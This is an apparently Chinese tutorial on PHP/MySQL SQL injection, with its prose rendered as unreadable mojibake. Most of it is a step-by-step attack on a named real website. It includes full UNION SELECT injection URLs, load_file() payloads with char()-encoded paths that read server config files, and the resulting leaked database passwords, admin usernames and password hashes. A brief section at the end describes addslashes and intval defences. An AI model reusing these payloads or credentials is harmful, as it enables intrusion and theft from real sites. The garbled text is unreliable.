ÎÒÃÇ¿´¶Á³öÀ´µÄÄÚÈÝ Å|ÿÿ? admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin question admin answerhttp://www.yoursite.com (?ì[?ûûKAì[?ì[? 127.0.0.1 d|?ÿ? aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com sdfasdfsdfa asdfadfasd ?EüKAMüKA 127.0.0.1 222 222222223423 ËäÈ»ÂÒÂëÒ»¶Ñ£¬µ«ÊÇÎÒÃÇ»¹ÊÇ¿ÉÒÔ¿´³öÓû§ÃûÊÇadmin£¬ÃÜÂëÊÇ698d51a19d8a121ce581499d7b701668£¬ºóÃæÆäËüµÄÊÇÁíÍâµÄÐÅÏ¢¡£ ͨ¹ýÕâÖÖ·½·¨ÎÒÃǾÍʵÏÖÁËÇúÏß¿ç¿â£¬ÏÂÃæµÄÀý×ÓÖÐÒ²»áÌᵽŶ£¡
˵ÁËÕâô¶àÏÂÃæÎÒÃÇÀ´¾ßÌåµÄʹÓÃÒ»´Î£¬Õâ´Î²âÊԵĶÔÏóÊǹúÄÚÒ»ÖøÃû°²È«ÀàÕ¾µã¨D¨DºÚ°×ÍøÂç ÌýÈ˼Ò˵ºÚ°×ÓЩ¶´£¿ÎÒÃÇÒ»ÆðÈ¥¿´¿´°É¡£ http://www.heibai.net/down/show.php?id=5403%20and%201=1 Õý³£ÏÔʾ¡£ Èçͼ35
http://www.heibai.net/down/show.php?id=5403%20and%201=2 php³ÌÐòÔ±Õ¾ ÏÔʾ²»Õý³£¡£ Èçͼ36
ºÃ£¬ÎÒÃǼÌÐø http://www.heibai.net/down/show.php?id=5403%20and%201=1 union select 1 ÏÔʾ½á¹ûÈçÏ Èçͼ37
×¢Ò⿴ͼÖÐûÓÐÏÔʾ³ÌÐòÃû£¬¶øÇÒ»¹¸½´øÁË Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\show.php on line 45
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\global.php on line 578
ÔÎÁË£¬Íøվ·¾¶³öÀ´ÁË£¬ÄǿɾÍËÀ¶¨ÁËŶ£¡ ÎÒÃǼÌÐø£¬Ö±µ½ÎÒÃDzµ½ http://www.heibai.net/down/show.php?id=5403%20and%201=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 www.phperz.com µÄʱºòÕý³£ÏÔʾÁË¡£ Èçͼ38
ºÃÎÒÃÇת»»Óï¾ä³ÉΪ http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ÏÔʾÈçͼ39
¿´¿´¼ò½é´¦ÏÔʾΪ12£¬ÎÒÃÇ¿ÉÒԲ²â´Ë´¦Ó¦¸ÃΪ×Ö·ûÐÍ£¡ Ok£¬ÎÒÃÇÏÂÃæ¿´¿´ÎļþÄÚÈÝÏÈ D:/web/heibai/down/show.phpת»¯³ÉasciiºóΪ char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112) ÎÒÃÇ view-sourcehttp://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)),13,14,15,16,17,18,19 phperz.com view-source:ÊÇÖ¸²ì¿´Ô´´úÂ룬ÖÁÓÚΪʲôÓã¬ÎÒÃǺóÃ潫½²µ½ ÏÔʾ³öËüµÄÔ´´úÂë Èçͼ40
ÒòΪÔÚshow.phpÖÐÓÐÒ»¾ä <META HTTP-EQUIV=REFRESH CONTENT='0;URL=list.php'> Èç¹ûÎÒÃÇÖ±½ÓÔÚä¯ÀÀÆ÷ÀïÌá½»»áÌøתµ½list.php ÎÒÃÇ·¢ÏÖÕâ¾ärequire ("./include/config.inc.php"); ºÃ¶«Î÷£¬Ó¦¸Ã·ÅÕâÅäÖÃÎļþ£¬ok¼ÌÐø d:/web/heibai/down/include/config.inc.php ת»¯³Échar(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112) ÎÒÃÇÊäÈë http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19 www.phperz.com ÏÔʾ½á¹ûÈçͼ41
ÀïÃæÄÚÈÝÖ÷ÒªÓÐ ………………….. ymDown (ҹèÏÂÔØϵͳ) ÊÇÒ»¸öÓ¦ÓÃÓÚÍøÕ¾ÌṩÏÂÔØ·þÎñµÄµÄ³ÌÐò // ------------------------- -------- ------------------------- // // ³£¹æÉèÖà // // ------------------------- -------- ------------------------- //
// Êý¾Ý¿âÐÅÏ¢ $dbhost = "localhost"; // Êý¾Ý¿âÖ÷»úÃû $dbuser = "download";// Êý¾Ý¿âÓû§Ãû $dbpasswd = "kunstar988"; // Êý¾Ý¿âÃÜÂë $dbname = "download"; // Êý¾Ý¿âÃû
// Cookie Ãû³Æ $cookie_name = "heibai"; // °æ±¾ºÅ $version = "1.0.1";
// Êý¾Ý±íÃû $down_table = ymdown; $down_user_table = ymdown_user; $down_sort1_table = ymdown_sort1; $down_sort2_table = ymdown_sort2; ÔÎÔÀ´ÓõÄÊÇҹèµÄÏÂÔØϵͳ£¬¶øÇÒÎÒÃÇÖªµÀÁË $dbuser = "download";// Êý¾Ý¿âÓû§Ãû $dbpasswd = "kunstar988"; // Êý¾Ý¿âÃÜÂë phperz.com ˵²»¶¨´ô»áÓÐÓÃŶ¡£ ÓõıíÃûÊÇĬÈϵıíÃû£¬ÎÒÃÇÖªµÀҹèµÄ¹ÜÀíÔ±ÃÜÂë·ÅÔÚymdown_userÖÐ ÎÒÃǼÌhttp://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,username,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from ymdown_user ½á¹ûÈçͼ42
¸ù¾ÝÌáʾÎÒÃÇÖªµÀÎļþ´óС´¦µÄÊÇusername£¬Ó¦ÓÃƽ̨´¦µÄÊÇpassword£¨¶ÔÕÕͼ36£© ¼´username=dload£¬password£½6558428£¬Ò¹Ã¨µÄºǫ́ĬÈÏÔÚadminĿ¼Ï£¬ÎÒÊÔÑéÁ˺ܾö¼Ã»ÓÐÕÒµ½£¬ÔÎÖ®¡£ ÏëÖ±½ÓÁ¬½Ómysql£¬·¢ÏÖtelnet¶Ë¿Ú²¢Ã»Óпª·Å¡£ÎÒÃÇÈ¥¿´¿´±ðµÄ°É£¡ http://www.heibai.net/vip/article/login.php ¿´ÆðÀ´ÏñÊÇ»áÔ±µÄµÇ½Ŷ£¬ÎÒÃÇ¿´¿´ÏÈ d:/web/heibai/vip/article/login.php ת»¯³Échar(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112) php³ÌÐòÔ±Ö®¼Ò ÎÒÃÇÊäÈë http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)),13,14,15,16,17,18,19 ½á¹ûÈçͼ43£º
ÆäÖÐ require ("./include/global.php"); require ("./include/config.inc.php"); require ("./mainfunction.php"); require ("./function.php"); µ±È»ÁË£¬ÎÒÃÇÈ¥¿´config.inc.php°É d:/web/heibai/vip/article/include/config.inc.php ת³Échar(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112) ÊäÈë http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19 php³ÌÐòÔ±Õ¾ ½á¹ûÈçͼ44
ÏÔʾÁ˺ܶàºÃ¶«Î÷Ŷ
$dbhost = "localhost"; // Êý¾Ý¿âÖ÷»úÃû $dbuser = "root"; // Êý¾Ý¿âÓû§Ãû $dbpass = "234ytr8ut"; // Êý¾Ý¿âÃÜÂë $dbname = "article"; // Êý¾Ý¿âÃû $ymcms_user_table = "user"; $ymcms_usergroup_table = "usergroup"; $ymcms_userrace_table = "userrace"; ±í»¹ÊÇĬÈÏµÄ±í£¬¶øÇÒ³öÀ´ÁËrootµÄÃÜÂë ÒªÊÇÄÜÁ¬ÉÏËüµÄmysql¸Ã¶àºÃ°¡£¬ÄÇÑùÎÒÃǾͿÉÒÔinto outfileÁË Í´¿àµÄÕÒÁËÕÒphpmyadmin£¬Ã»ÓÐÕÒ¼û£¬»òÐí¸ù±¾¾ÍûÓÐÓᣠ¶Ác:/winnt/php.ini·¢ÏÖ ; Magic quotes ; ; Magic quotes for incoming GET/POST/Cookie data. magic_quotes_gpc = On 55555555£¬Í´¿àÖУ¬ÎÒÃÇ¿´¿´Äܲ»Äܸ㼸¸ö»áÔ±Õ˺Š²Â²â»áÔ±Õ˺ŷÅÔÚuser±íÖУ¬ÎÒÃÇÖ±½Ó¶ÁdataÏÂarticleÎļþ¼ÐÀïµÄuser.mydÎļþ Article/user.mydת»»³É char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100) ÎÒÃÇÊäÈë http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100)),13,14,15,16,17,18,19 php³ÌÐòÔ±Ö®¼Ò ½á¹ûÈçͼ45£º
ÔÎÁË£¬¾¹È»Ã»Óзµ»Ø¡£ÎÒÃÇÀ´¶ÁArticle/user.frm http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,102,114,109)),13,14,15,16,17,18,19 ½á¹ûÈçͼ46
ÔÎÁË£¬±í½á¹¹¶¼ÔÚ£¬¶øÇÒ¶ÁArticle/user.myiʱҲ³É¹¦£¬¿ÉÊÇΪʲôArticle/user.myd¶Á²»³öÀ´ÄØ?ÒªÊÇmagic_quotes_gpc£½OffÎÒÃÇ»¹¿ÉÒÔinto outfileÀ´¿´¿´£¬¿ÉÊÇ…… ÓôÃÆÖУ¬²âÊÔ¾ÍÕâÑù½áÊø°É£¬ÏÂÃæµÄ¹¤×÷»¹ÊÇÁô¸øÄãÃÇÀ´Íê³É°É£¡ ÎÄÖÐËùÊöÎÊÌâÒѾ֪ͨÐÇÀ¤ÁË£¡ ËÄ£ºphp£«mysql×¢ÈëµÄ·À·¶·½·¨¡£ ÔÚÉÏÒ»ÆÚµÄרÌâÀïÒѾ½²Á˺ܶàµÄ·À·¶·½·¨£¬ÕâÀïÎÒ¾ÍÖ÷Òª½²Ò»ÏÂphp+mysql×¢Éä¹¥»÷µÄ·À·¶·½·¨¡£ ´ó¼Ò¿´µ½£¬ÔÚmagic_quotes_gpc£½OnµÄʱºò£¬ºÜ¶àµÄ×¢Éä¹¥»÷ÒѾûÓÐ×÷ÓÃÁË¡£ ÎÒÃÇ¿ÉÒÔÀûÓÃÕâ¸öÀ´¼Ó¹ÌÎÒÃǵijÌÐò¡£Addslashes£¨£©º¯ÊýµÈͬÓÚmagic_quotes_gpc£½On£¬¶øÇÒÓëmagic_quotes_gpc£½OnÒ²²»³åÍ»£¬ÎÒÃÇ¿ÉÒÔÕâÑù¹ýÂË php³ÌÐòÔ±Õ¾ $username = addslashes($username); $query="SELECT * FROM users WHERE userid='$username'"); ¶ÔÓÚidÐÍÎÒÃÇ¿ÉÒÔÀûÓÃintval()º¯Êý£¬intval()º¯Êý¿ÉÒÔ½«±äÁ¿×ª»»³ÉÕûÊýÀàÐÍ£¬ÕâÑù¾Í¿ÉÒÔÁË¡£ ÎÒÃÇ¿ÉÒÔÕâÑù $id = intval($id); $query="SELECT * FROM alphadb WHERE articleid='$id'"); Èç¹ûÊÇ×Ö·ûÐ͵ÄÄØ£¿ ÎÒÃÇ¿ÉÒÔÏÈÓÃaddslashes()¹ýÂËһϣ¬È»ºóÔÙ¹ýÂË”%”ºÍ”_”. ÀýÈ磺 $search = addslashes($search); $search = str_replace("_","\_",$search); $search = str_replace("%","\%",$search); ¼ÇµÃ£¬¿ÉǧÍò±ðÔÚmagic_quotes_gpc£½OnµÄÇé¿öÏÂÌæ»»\Ϊ\\,ÈçÏ£º $password=str_replace("\\","\\\\",$password); ÎҼǵÃÔÚdarknessµÄÎÄÕ¡¶¶ÔijPHPÕ¾µãµÄÒ»´ÎÉø͸¡·ÖÐÌáµ½¹ýÕâ¸öÎÊÌ⣨ÔÚ¹âÅÌÖÐÓÐÊÕ¼£©¡£ »¹ÓеľÍÊǵǽµÄµØ·½£¬Èç¹ûÊÇÖ»ÓÃÒ»¸ö¹ÜÀíÔ±¹ÜÀíµÄ»°£¬ÎÒÃÇ¿ÉÒÔÖ±½Ó¶ÔusernameºÍpasswdÓÃmd5¼ÓÃÜ£¬ÕâÑù¾Í²»Óú¦ÅÂ×¢Èë¼¼ÊõµÄ·¢Õ¹ÁË¡£ Username=md5($HTTP_POST_VARS["username"]); php³ÌÐòÔ±Ö®¼Ò Passwd=md5($HTTP_POST_VARS["passwd"]); Îҵĺǫ́µÇ½¾ÍÊÇÕâÑù×ÓµÄŶ¡£
|